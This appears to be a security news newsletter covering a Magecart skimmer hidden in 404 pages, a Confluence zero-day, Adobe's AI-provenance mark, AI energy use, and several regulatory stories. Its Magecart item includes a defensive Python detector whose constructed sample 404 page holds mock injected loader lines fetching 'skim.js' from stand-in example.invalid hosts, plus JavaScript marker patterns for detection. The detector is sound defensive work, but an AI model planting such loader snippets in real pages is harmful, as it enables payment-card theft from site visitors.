Hijacked 404 pages, Chinese attackers target Confluence, Adobe’s “icon of transparency”
404 pages hijacked
Researchers at Akamai spotted a new campaign by the threat actors behind the Magecart payment skimmer. The loader hides its JavaScript inside an HTML comment on a site's 404 page, and the attackers modify other pages on the site to request a nonexistent folder, so visitors' browsers fetch the 404 page, and with it the hidden code, far more often than they normally would. While this is consistent with Magecart operators finding new ways to obfuscate their code, the researchers noted that a deliberate call to a nonexistent path is a much "noisier" approach than the group typically employs, and therefore easier to spot in web server logs.
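As an added illustration, not code from the Akamai write-up or the newsletter, here is a small Python check that scans a 404 response body for HTML comments that either contain JavaScript directly or contain a long base64 run that decodes to JavaScript. The sample 404 page, the two injected comments, and the `example.invalid` host are constructed for this example; the marker list is a heuristic starting point, not a signature for any specific skimmer.

```python
import base64
import binascii
import re

# Constructed sample: a hypothetical 404 body with two injected comments.
# The hidden payload is base64-encoded at import time so the sample is
# exact; nothing here is copied from a real skimmer.
_HIDDEN_PAYLOAD = (
    b"document.write('<script src=\"https://cdn.example.invalid/skim.js\">"
    b"</script>');"
)
SAMPLE_404_BODY = (
    "<!DOCTYPE html>\n<html><head><title>404 Not Found</title></head>\n<body>\n"
    "<h1>Sorry, that page does not exist.</h1>\n"
    "<!-- theme: storefront 2.3, cache miss -->\n"
    f"<!-- {base64.b64encode(_HIDDEN_PAYLOAD).decode()} -->\n"
    "<!-- var s=document.createElement('script');s.src='//example.invalid/l.js';"
    "document.head.appendChild(s); -->\n"
    "</body></html>\n"
)

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
# A run of 40+ base64 characters is far longer than any normal comment token.
BASE64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Tokens that have no business inside a comment on a static error page.
JS_MARKERS = (
    "eval(", "atob(", "createElement(", "document.write(",
    "appendChild(", ".src=", "new Function(",
)


def decode_base64_candidates(text):
    """Return the UTF-8 decoding of every long base64 run in text."""
    decoded = []
    for match in BASE64_RUN_RE.finditer(text):
        blob = match.group(0)
        # Re-pad, then decode strictly so random letter runs are rejected.
        padded = blob + "=" * (-len(blob) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
            decoded.append(raw.decode("utf-8"))
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
    return decoded


def score_comment(comment):
    """Return a list of reasons a comment looks like a hidden loader."""
    reasons = []
    if any(marker in comment for marker in JS_MARKERS):
        reasons.append("javascript markers in comment")
    decoded = decode_base64_candidates(comment)
    if decoded:
        reasons.append("long base64 run")
        if any("<script" in d or any(m in d for m in JS_MARKERS) for d in decoded):
            reasons.append("base64 decodes to javascript")
    return reasons


def find_suspicious_comments(html):
    """Scan an HTML body and return every comment with at least one reason."""
    findings = []
    for match in COMMENT_RE.finditer(html):
        body = match.group(1).strip()
        reasons = score_comment(body)
        if reasons:
            findings.append({"comment": body[:80], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_comments(SAMPLE_404_BODY):
        print(finding["reasons"], "->", finding["comment"])
```

Run it against the body your own origin returns for a bogus path (the attack only works if the 404 page itself is served with the comment intact), and pair it with an alert on a sustained rise in 404s that originate from your own first-party pages, since that spike is the "noise" the researchers refer to.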
Atlassian Confluence attacked by state-backed actors
Researchers at Microsoft’s Threat Intelligence unit disclosed that the Chinese state-backed group Storm-0062 has been exploiting a zero-day in Atlassian Confluence Data Center and Server since at least September 14th. Atlassian itself disclosed the attacks on October 4th, but at the time did not name the group behind the campaign. The zero-day lets attackers create arbitrary administrator accounts on vulnerable instances. Researchers at GreyNoise said initial data shows exploitation remains very limited so far. However, Rapid7 released a fully documented proof-of-concept exploit this week, which could change that quickly. Confluence administrators should also audit their instances for unexpected administrator accounts, since patching does nothing about an account an attacker has already created.
Adobe’s “icon of transparency”
The company introduced a new symbol, attached to content as part of its metadata, that indicates whether AI tools created it. Adobe developed it through the Coalition for Content Provenance and Authenticity, or C2PA. It will roll out first to Adobe’s Creative Cloud apps, and eventually to Microsoft’s Bing Image Generator. When content is viewed online, users can hover over the mark to see details on ownership, the AI tool used in its creation, and more. While the C2PA counts industry heavyweights like Arm, Intel, and Microsoft among its members, we covered a study just last week that demonstrated how easily such AI watermarks can be washed away. Because the mark lives in metadata, its presence can support a provenance claim, but its absence proves nothing, since metadata can simply be stripped.
Study warns about AI energy usage
A new study in the journal Joule by Alex de Vries, a PhD candidate at the VU Amsterdam School of Business, estimates that the AI industry will consume 85 to 134 terawatt-hours of electricity per year by 2027. He based these figures on supply and sales estimates for Nvidia’s high-end chips, which are expected to supply 95% of the industry’s AI hardware. De Vries framed this as roughly the annual electricity consumption of the Netherlands, or about 0.5% of current global consumption. The study accounts only for energy used by the chips themselves, not the additional data center cooling needed to operate them. Speaking to the BBC, the data center firm DataVita said AI-focused racks currently draw 20 times more power than a standard rack.
(BBC)
Huge thanks to our sponsor, Hyperproof
Newsom signs California’s Delete Act
We previously covered that the California legislature passed the Delete Act. It has now been signed into law. The act directs the California Privacy Protection Agency to build a tool that lets Californians demand that every registered data broker delete their personal information with a single request. The law requires the CPPA to have the tool in place by the start of 2026. The act doesn’t change the privacy protections introduced by the California Privacy Rights Act, but it makes those protections far easier to act on.
(LA Times)
SEC investigating 2018 Twitter security lapse
The US Securities and Exchange Commission has begun a probe into how the social platform now known as X exposed users’ personal information five years ago. Bloomberg’s sources say the agency will look at whether executives at the time failed to disclose the privacy issues to shareholders, or subsequently failed to put controls in place to prevent a recurrence. At the time, a bug on the platform let anyone view a user’s email address during a password reset attempt.
Exchange anti-spam rules break mail delivery
Numerous users reported receiving “server busy” error messages from Exchange Online, affecting a subset of Microsoft 365 customers globally. The result was delayed or failed delivery of inbound mail from outside organizations. Microsoft confirmed the issue on October 11th and said it had begun an investigation. The company later updated its advisory to say the issue appears linked to the erroneous triggering of anti-spam rules, with some sending IP addresses receiving false-positive spam flags. As of this writing, Microsoft says it is still working on a remediation plan. It’s unclear how many users the error affected.
SEC investigates MOVEit
In a regulatory filing, Progress Software disclosed that the US SEC has opened an investigation into the rash of hacks stemming from the vulnerabilities in its MOVEit managed file transfer product. The company received a subpoena for documents and information related to the vulnerability. Emsisoft estimates the MOVEit attacks affected over 2,500 organizations. In the filing, Progress said costs related to the vulnerability so far amount to $1 million, but noted that losses could mount, with 23 customers having launched legal action against it and 58 class action lawsuits filed by individuals. Progress Software also said a separate security incident in November 2022 could result in a further $4.2 million in costs.